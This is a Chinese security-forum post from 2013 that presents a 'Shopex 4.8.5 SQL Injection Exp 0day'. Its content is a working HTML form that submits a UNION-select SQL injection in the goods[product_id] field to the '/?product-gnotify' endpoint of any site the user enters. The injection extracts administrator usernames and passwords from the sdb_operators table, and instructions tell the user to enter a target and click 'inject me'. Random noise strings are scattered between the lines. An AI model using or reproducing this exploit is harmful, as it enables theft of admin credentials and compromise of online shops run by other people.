中国网络渗透测试联盟
标题:
Shopex 4.8.5 SQL Injection Exp 0day
[打印本页]
作者:
admin
时间:
2013-1-23 09:20
标题:
Shopex 4.8.5 SQL Injection Exp 0day
<center>
, Q. m( J- h) C) \: K7 Q4 m( Y
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
! i8 t$ U1 B+ F7 N1 r" g
<form action="" method="post" name="submit_url">
3 j7 D- V! e! u8 i
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
7 Q2 K0 p5 V' U# k0 E Z6 P2 p
<input type="hidden" name="goods[goods_id]" value="3">
* D; j$ m' @) ]: F( R3 w
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
+ |6 h3 R2 Z2 M9 R
<input type="submit" value="给我注入" onclick=fsubmit()>
2 K9 ^4 W; O: t/ S( |
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
. Q; W& y; \6 e. b2 Q
7 l6 d+ @, _0 D7 `- P; H& p
<script>
3 D; h9 c4 O' ~
function fsubmit(){
0 u* Q5 ^6 c0 f# t
form = document.forms[0];
# `* S8 b( b6 T, ?
form.action = form.url.value+'/?product-gnotify';
5 H2 R+ v* E* J. A3 [
form.submit();
/ G( {: ]' W. }; {3 H" |
}
+ Q V$ O9 J+ T7 W/ W6 S x; v
</script>
" A) w2 S6 ~+ I9 b/ H1 r
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2